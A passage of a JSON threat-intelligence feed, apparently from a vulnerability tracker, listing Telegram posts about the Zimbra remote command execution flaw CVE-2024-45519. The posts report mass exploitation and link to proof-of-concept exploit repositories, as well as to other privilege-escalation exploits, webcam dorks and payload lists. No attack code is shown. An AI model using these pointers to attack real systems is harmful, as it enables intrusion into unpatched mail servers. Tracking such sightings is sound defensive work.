\u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0446\u0438\u0435\u0439 \u043e\u0442\u0432\u0435\u0442\u0430\u043c\u0438 DNS, \u0435\u0441\u043b\u0438 \u0434\u043e\u043c\u0435\u043d\u044b \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0437\u0430\u043d\u0435\u0441\u0435\u043d\u043d\u044b\u0435 \u0432 \u0447\u0435\u0440\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u043b\u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u0441\u043b\u043e\u0432\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0442\u0430\u043a\u043e\u0435 \u043d\u0435\u0437\u0430\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043e \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a DNS poisoning.", "creation_timestamp": "2024-10-01T18:40:05.000000Z"}, {"uuid": "e6928e07-7d96-4766-912a-48a634030c83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/805", "content": "PoC CVE-2024-45519 - Zimbra Postjournal Exploit \ud83d\udd2a\n\nExploit\n\n#Poc #cve #exploit \n\nJoin RootExploit \ud83d\udc8e", "creation_timestamp": "2024-10-07T15:28:05.000000Z"}, {"uuid": "682e2582-ebce-4f23-a589-89e0b428fa91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/795", "content": "exploit + lab setup for CVE-2024-45519 \ud83d\udd25\n\nGithub\n\n#Cve #Exploit\n\nJoin RootExploit \ud83d\udc8e", "creation_timestamp": "2024-10-05T11:18:39.000000Z"}, {"uuid": "f3ccb0c9-668b-41ec-8c3e-f63cba7f5fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/ctinow/224425", "content": "Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. Patch it now!\nhttps://ift.tt/duWePKx", "creation_timestamp": "2024-10-02T12:09:49.000000Z"}, {"uuid": "df3efb8a-592f-4195-a3a9-e5a506224365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9184", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-10-01T19:58:18.000000Z"}, {"uuid": "2d09665d-90a0-44b7-83be-8d8fd2f10c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/thehackernews/5670", "content": "\u26a0\ufe0f Zimbra Collaboration is under attack via a critical vulnerability (CVE-2024-45519) enabling remote command execution. \n \nEven without Zimbra\u2019s postjournal enabled, attackers can exploit this flaw with crafted SMTP messages. \n \nLearn more: https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html", "creation_timestamp": "2024-10-02T07:58:40.000000Z"}, {"uuid": "2b6e09f2-ae63-44ea-919a-91baf71ee64c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/xakep_ru/16495", "content": "\u0425\u0430\u043a\u0435\u0440\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Zimbra, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u043f\u0438\u0441\u044c\u043c\u0430 \u043d\u0430 SMTP-\u0441\u0435\u0440\u0432\u0435\u0440\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0443\u0436\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0443\u044e RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Zimbra. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043e\u0441\u043b\u043e\u0436\u043d\u044f\u0435\u0442\u0441\u044f \u0442\u0435\u043c, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u043d\u0430 SMTP-\u0441\u0435\u0440\u0432\u0435\u0440 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u0438\u0441\u0435\u043c.\n\nhttps://xakep.ru/2024/10/03/zimbra-cve-2024-45519/", "creation_timestamp": "2024-10-03T16:47:57.000000Z"}, {"uuid": "728b7d00-0b2a-41e9-a622-854a5650090f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9166", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-09-29T15:35:51.000000Z"}, {"uuid": "f6a17e53-7633-4027-acca-fc3928f1d9d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/25904", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-04T14:13:35.000000Z"}, {"uuid": "f7921ad2-30c3-4ed6-8666-490a7e0c84a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/CyberBulletin/25905", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-04T14:13:33.000000Z"}, {"uuid": "333f3cc2-ff8f-44c1-9438-99e87671058c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11202", "content": "#exploit\n1. CVE-2024-45489:\nArc Browser RCE in JavaScript Boosts\nhttps://kibty.town/blog/arc\n\n2. CVE-2024-44623:\nBlind RCE issue(SPX-GC) in SPX-GC\nhttps://github.com/merbinr/CVE-2024-44623\n\n3. CVE-2024-6769:\nPoisoning the activation cache to elevate from medium to high integrity in Windows 10/11/Srv2019/Srv2022\nhttps://github.com/fortra/CVE-2024-6769\n\n4. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-> https://github.com/p33d/CVE-2024-45519", "creation_timestamp": "2024-11-01T03:20:06.000000Z"}, {"uuid": "dabed7c4-7e36-4090-9b40-502aafdbf30d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3252", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T20:31:34.000000Z"}, {"uuid": "72ef0e9e-00bf-41a1-9ce2-4dffba3e3103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3793", "content": "Tools - Hackers Factory \n\nMemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR \n\nhttps://github.com/evild3ad/MemProcFS-Analyzer\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nGet PROXY List that gets updated everyday \n\nhttps://github.com/TheSpeedX/PROXY-List\n\nPrying Deep - An OSINT tool to collect intelligence on the dark web\n\nhttps://github.com/iudicium/pryingdeep\n\nA tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs. \n\nhttps://github.com/saw-your-packet/CloudShovel\n\nCVE-2024-45519\n\nhttps://github.com/p33d/CVE-2024-45519\n\nCVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13 \n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nGoogle & Shodan Dorks for WebCam\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-14T06:01:06.000000Z"}, {"uuid": "57e94046-d125-45c8-b2c2-e2ec55af951e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1066", "content": "Tools - Hackers Factory \n\nMemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR \n\nhttps://github.com/evild3ad/MemProcFS-Analyzer\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nGet PROXY List that gets updated everyday \n\nhttps://github.com/TheSpeedX/PROXY-List\n\nPrying Deep - An OSINT tool to collect intelligence on the dark web\n\nhttps://github.com/iudicium/pryingdeep\n\nA tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs. \n\nhttps://github.com/saw-your-packet/CloudShovel\n\nCVE-2024-45519\n\nhttps://github.com/p33d/CVE-2024-45519\n\nCVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13 \n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nGoogle & Shodan Dorks for WebCam\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-14T06:00:43.000000Z"}, {"uuid": "ea8f99ad-a9c0-4cc9-bebd-52ba61b02075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/InfoSecInsider/423", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "a00cdefa-ec14-4e45-ad00-a1ad668a5b2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/InfoSecInsider/424", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "65be7875-7e47-4b2b-8d09-a24688bc9b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/474", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:33.000000Z"}]}